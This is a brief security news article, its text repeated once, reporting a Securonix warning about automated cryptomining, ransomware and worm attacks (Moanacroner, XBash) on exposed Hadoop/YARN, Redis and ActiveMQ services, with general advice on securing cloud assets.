Securonix, a security research firm has warned about an increase in the number of attacks targeting cloud infrastructure/Hadoop/YARN, with the multi-vector and multi-platform automated attacks using security analytics: Moanacroner and XBash, among others.

The automated attacks target exposed cloud infrastructure/Hadoop/YARN instances, while the attack vector includes: Moanacroner (which is a variant of Sustes) – fairly trivial, but fully targeted single-vector/single-platform attacks that's mainly focused on Cryptocurrency mining.

According to the Researchers, the main focus of the attackers is to install a second-stage payload for cryptomining and/or remote access, but in some other instances the malware propagates and infects exposed services, corrupting data and installing second-stage cryptomining and ransomware payloads.

The attackers exploit unpatched vulnerabilities or exposed configurations in cloud services like the Apache Hadoop processing toolset or Redis data infrastructure, using brute-force attacks.

And the key vectors in the attacks include Hadoop unauthenticated command execution and Redis remote command execution, but there are still other vectors like the ActiveMQ (Arbitrary File Execution).

However, the most common malware tools remains the XBash worm, which was first reported in May 2018, infecting both Windows and Linux servers, and fully capable of deploying additional payloads depending on the operating system involved.

The Xbash botnet has shown a distinguishing combination of cryptojacking, cybersabotage, and multi-platform characteristics, with the malware deleting critical databases, installing cryptojacking scripts, and acting as a ransomware.

Albeit, the vulnerable services are often not designed to be accessible via the internet, such as Redis, and they don't normally have strong security controls by default.

It is recommended that affected services should implement stronger security for all cloud offerings, irrespective of whether the services are for remote management, or data storage for applications or messaging clients. And a security management system is also needed for the cloud assets, to effectively tackle critical vulnerabilities.

Persistent Cloud Infrastructure/Hadoop/YARN Attacks via Moanacroner, XBash and Others



Securonix, a security research firm has warned about an increase in the number of attacks targeting cloud infrastructure/Hadoop/YARN, with the multi-vector and multi-platform automated attacks using security analytics: Moanacroner and XBash, among others.

The automated attacks target exposed cloud infrastructure/Hadoop/YARN instances, while the attack vector includes: Moanacroner (which is a variant of Sustes) – fairly trivial, but fully targeted single-vector/single-platform attacks that's mainly focused on Cryptocurrency mining.

According to the Researchers, the main focus of the attackers is to install a second-stage payload for cryptomining and/or remote access, but in some other instances the malware propagates and infects exposed services, corrupting data and installing second-stage cryptomining and ransomware payloads.

The attackers exploit unpatched vulnerabilities or exposed configurations in cloud services like the Apache Hadoop processing toolset or Redis data infrastructure, using brute-force attacks.

And the key vectors in the attacks include Hadoop unauthenticated command execution and Redis remote command execution, but there are still other vectors like the ActiveMQ (Arbitrary File Execution).

However, the most common malware tools remains the XBash worm, which was first reported in May 2018, infecting both Windows and Linux servers, and fully capable of deploying additional payloads depending on the operating system involved.

The Xbash botnet has shown a distinguishing combination of cryptojacking, cybersabotage, and multi-platform characteristics, with the malware deleting critical databases, installing cryptojacking scripts, and acting as a ransomware.

Albeit, the vulnerable services are often not designed to be accessible via the internet, such as Redis, and they don't normally have strong security controls by default.

It is recommended that affected services should implement stronger security for all cloud offerings, irrespective of whether the services are for remote management, or data storage for applications or messaging clients. And a security management system is also needed for the cloud assets, to effectively tackle critical vulnerabilities.

No comments